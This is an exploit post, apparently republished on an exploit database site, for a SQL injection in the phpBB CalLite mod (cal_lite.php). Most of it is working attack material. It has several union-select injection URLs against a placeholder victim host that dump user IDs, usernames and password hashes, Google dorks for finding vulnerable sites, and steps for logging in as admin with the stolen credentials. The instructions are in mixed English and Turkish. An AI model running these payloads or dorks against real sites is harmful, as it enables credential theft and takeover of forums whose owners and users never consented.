phpBB CalLite Mod (cal_lite.php) SQL Injection

Exploit Code :

#########################################
#
# RECORD PAGES ABOUT phpBB GOOD LUCKY
#
##########################################
##########################################
#
# Powered by phpBB (cal_lite.php) SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
***INFORMATION***

you must change table name ( bisey degistirmen lazim)
i wrote s@bun you must write site name before (site.name.here_users) but
only first one word

/S@BUN_users/*<<< YOU MUST CHANGE S@BUN with site name

S@BUN yazan yere sitenin ilk adini yazacaksin orneklerde var
(site.ismi.buraya_users)
fakat ilk olan ve tek kelime yazilacak

/S@BUN_users/*<<< S@BUN yazan yeri site adiyla degistir(ilk olan ve tek
kelime yazilacak)

#############################################

EXAMPLES 1

http://[victim].com/cal_lite.php?cl_d=10&cl_m=-99999/**/union/**/select/**/
concat(user_id,char(58),username,char(58),user_password),concat(user_id,cha
r(58),username,char(58),user_password),11111/**/from/**/[victim]_users/*
site name http://[victim].com and we will use
/**/from/**/[victim]_users/*

EXAMPLES 2

http://[victim].com/cal_lite.php?cl_d=10&cl_m=-99999/**/union/**/select/**/
concat(user_id,char(58),username,char(58),user_password),concat(user_id,cha
r(58),username,char(58),user_password),11111/**/from/**/[victim]_users/*

AGAIN WE CHANGED /**/from/**/[victim]_users/* (WITH SITE NAME [victim])

EXAMPLES 3

http://[victim]/cal_lite.php?cl_d=10&cl_m=-99999/**/union/**/select/**/conc
at(user_id,char(58),username,char(58),user_password),concat(user_id,char(58
),username,char(58),user_password),11111/**/from/**/[victim]_users/*

WE CHANGED AGAIN /**/from/**/[victim]_users/* (SITE FIRST NAME
[victim])

##################################################
#
# DORK 1 : allinurl: "cal_lite php"
#
# DORK 2 : allinurl: "cal_lite php cl_d"cl_m
#
DORK 3 : allinurl: "foros.ws/cal_lite.php"
#
# DORK 4 : allinurl: "ief.st/cal_lite.php"
#
# *****not use only google and search in country becouse have much
site*****
#
##################################################

EXPLOiT::

dont forget /from/**/(HERE.SITE.NAME)_users/* cahnge here write site name

(/from/**/(HERE.SITE.NAME)_users/*) (HERE.SITE.NAME)yazan yere site adi
yazilacak

cal_lite.php?cl_d=1&cl_m=-99999/**/union/**/select/**/concat(user_id,char(5
8),username,char(58),user_password),concat(user_id,char(58),username,char(5
8),user_password),11111/**/from/**/(HERE.SITE.NAME)_users/*

admin login>>>> www.XXXsiteXXXX.com/login.php?redirect=admin/index.php

AND DONT FORGET YOU MUST WRITE 2 TIME PHPBB PASSWORD

PHPBB DE PASSWORD iki kere yazilir unutmayin ilkinde kabul etmez

##################################################

AND YOU WILL SEE ALL USERS PASSWORD
AND YOU WILL SEE ALL USERS PASSWORD
AND YOU WILL SEE ALL USERS PASSWORD
AND YOU WILL SEE ALL USERS PASSWORD
AND YOU WILL SEE ALL USERS PASSWORD

###########################################
------------------S@BUN-------------------#
###########################################
-----hackturkiye.hackturkiye@gmail.com----#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################
##########################################
#
# FENERBAHCE YE CHEALSE MACINDA BASARILAR
#
##########################################

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason